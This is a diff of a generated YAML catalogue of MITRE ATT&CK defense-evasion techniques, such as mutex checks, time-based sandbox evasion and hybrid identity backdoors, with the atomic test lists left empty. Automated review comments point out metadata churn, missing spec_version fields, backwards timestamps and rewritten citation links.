x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
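Review bot: the new T1480.002 (Mutual Exclusion) object ends with `atomic_tests: []` but has no `identifier: T1480.002` line, while the adjacent T1620 and T1070.006 objects do; other objects in this file (T1574.014, T1600.001, T1205) also lack it, so the generator appears to emit `identifier` only under some condition. Confirm what that condition is and whether anything downstream depends on the field being present. Two smaller points from upstream text: the third contributor uses an en dash (`Nagahama Hiroki – NEC Corporation Japan`) where the other contributor entries use a comma, and `x_mitre_detection: ''` is empty, which matches other recent objects in the file such as T1574.014.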
@@ -4200,57 +4352,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
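Review bot: `spec_version: '2.1'` is removed from the T1564.011 object here and from nearly every other technique object in this patch, with nothing replacing it; state in the PR description whether any consumer of this YAML reads `spec_version`, because in a STIX 2.1 bundle that field is required on every object and its blanket removal looks like a side effect of a new upstream source rather than a deliberate choice. The 57-line deletion under T1497.003 in this same hunk is not a content change either: the platforms, domains, contributors, id, type, created, created_by_ref and external_references are all re-emitted later in the patch in a different key order. Serializing keys in a stable order in the generator would turn these refreshes into reviewable diffs instead of whole-object delete-and-readd blocks.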
@@ -4265,6 +4370,12 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1218.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T19:35:43.077Z'
name: 'Signed Binary Proxy Execution: CMSTP'
description: |-
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
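Review bot: the Deloitte Environment Awareness reference for T1497.003 now ends in `/edit` (`https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) with a September 13, 2024 retrieval date, whereas the removed entry used the bare file URL. The `/edit` form is the owner's editing link; check that it resolves for an anonymous reader before keeping it, or prefer the `/view` form. The rest of this hunk only moves metadata (`revoked: false`, `x_mitre_attack_spec_version: 3.2.0`, re-ordered references) while `x_mitre_version` stays at '1.2', so no technique content changed here.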
@@ -4338,8 +4490,8 @@ defense-evasion:
external_id: T1218.003
- source_name: Twitter CMSTP Usage Jan 2018
description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
- Retrieved April 11, 2018.
- url: https://twitter.com/ItsReallyNick/status/958789644165894146
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/958789644165894146
- source_name: Microsoft Connection Manager Oct 2009
description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
April 11, 2018.
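Review bot: the `twitter.com` status links are rewritten to `x.com` and their retrieval dates moved to September 12, 2024 while the description text is unchanged; the same rewrite appears for Twitter CMSTP Jan 2018 and change_rdp_port_conti further down. Keeping the `source_name` keys as "Twitter ..." is correct, since the descriptions cite them by that exact string. Because these are social-media posts that can be deleted or hidden at any time, recording an archived copy of each post alongside the live link would make the citation durable.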
@@ -4358,13 +4510,12 @@ defense-evasion:
url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
- source_name: Twitter CMSTP Jan 2018
description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
- applocker bypass. Retrieved April 11, 2018.
- url: https://twitter.com/NickTyrer/status/958450014111633408
+ applocker bypass. Retrieved September 12, 2024.
+ url: https://x.com/NickTyrer/status/958450014111633408
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.003
atomic_tests: []
T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.002
atomic_tests: []
T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T19:01:55.821Z'
name: 'Signed Binary Proxy Execution: Control Panel'
description: |-
Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
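Review bot: the `modified` timestamp for T1218.002 moves backwards, from '2022-05-11T14:00:00.188Z' to '2022-03-11T19:01:55.821Z'. The same regression shows for T1599.001, T1553.003, T1207, T1553.006, T1574.006, T1222 and T1134.002 in this patch. A backwards `modified` means these objects are now being read from a different upstream bundle rather than having been edited, so any sync or cache logic that compares `modified` to detect technique changes will treat them as older than what it already has. Name the new upstream source and version in the commit message so the timestamp shift is explainable later.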
@@ -4559,8 +4709,6 @@ defense-evasion:
- User
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.002
atomic_tests: []
T1599.001:
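Review bot: T1218.002 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with no `+` line restoring an attack spec version, unlike T1497.003 above where it is re-emitted as 3.2.0; T1599.001 and T1207 are handled the same way later in the patch. The hunks show only part of each object, so verify the field is still present elsewhere in those three objects, or confirm the consumer tolerates its absence; otherwise they end up carrying no ATT&CK spec version at all.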
@@ -4583,7 +4731,7 @@ defense-evasion:
url: https://tools.ietf.org/html/rfc1918
description: IETF Network Working Group. (1996, February). Address Allocation
for Private Internets. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T01:45:58.951Z'
name: Network Address Translation Traversal
description: "Adversaries may bridge network boundaries by modifying a network
device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
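Review bot: the platform list for T1550 drops 'Office 365' and 'Google Workspace' and adds 'Identity Provider' and 'Office Suite', with `x_mitre_version` bumped from '1.3' to '1.4'; T1556.007, T1078.001 and T1548 get the same treatment further down, also dropping 'Azure AD'. Anything that filters techniques by the old platform strings will stop matching these objects, so regenerate whatever is derived from `x_mitre_platforms` in this same change rather than leaving it to a later sync, and mention the platform consolidation in the PR description.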
@@ -4702,18 +4849,17 @@ defense-evasion:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.004:
technique:
- modified: '2024-03-28T00:01:08.337Z'
+ modified: '2024-09-12T19:37:57.867Z'
name: 'Impair Defenses: Disable or Modify System Firewall'
description: |-
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.004
atomic_tests: []
T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
* **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T04:58:58.214Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.003
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
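Review bot: the description prose is renamed from Azure AD to Microsoft Entra ID, but the citation markers inside the same text still read `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)`. That is only correct if the object's `external_references[].source_name` values, which sit outside this hunk, were left unrenamed too; check them, because a marker without a matching `source_name` renders as a dangling citation. The missing space in `Entra ID(Citation:` is carried over from the old `Azure AD(Citation:` text and belongs to upstream, not something to hand-fix in generated YAML.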
@@ -4905,9 +5049,9 @@ defense-evasion:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.015:
technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.012:
technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.012
atomic_tests: []
T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
source_name: ADDSecurity DCShadow Feb 2018
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:20:04.850Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1207
atomic_tests: []
T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:03.480Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Subvert Trust Controls: Code Signing Policy Modification'
x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.006
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests: []
T1112:
@@ -5451,12 +5587,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1112
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5475,6 +5610,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -5482,7 +5618,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -5502,29 +5637,31 @@ defense-evasion:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
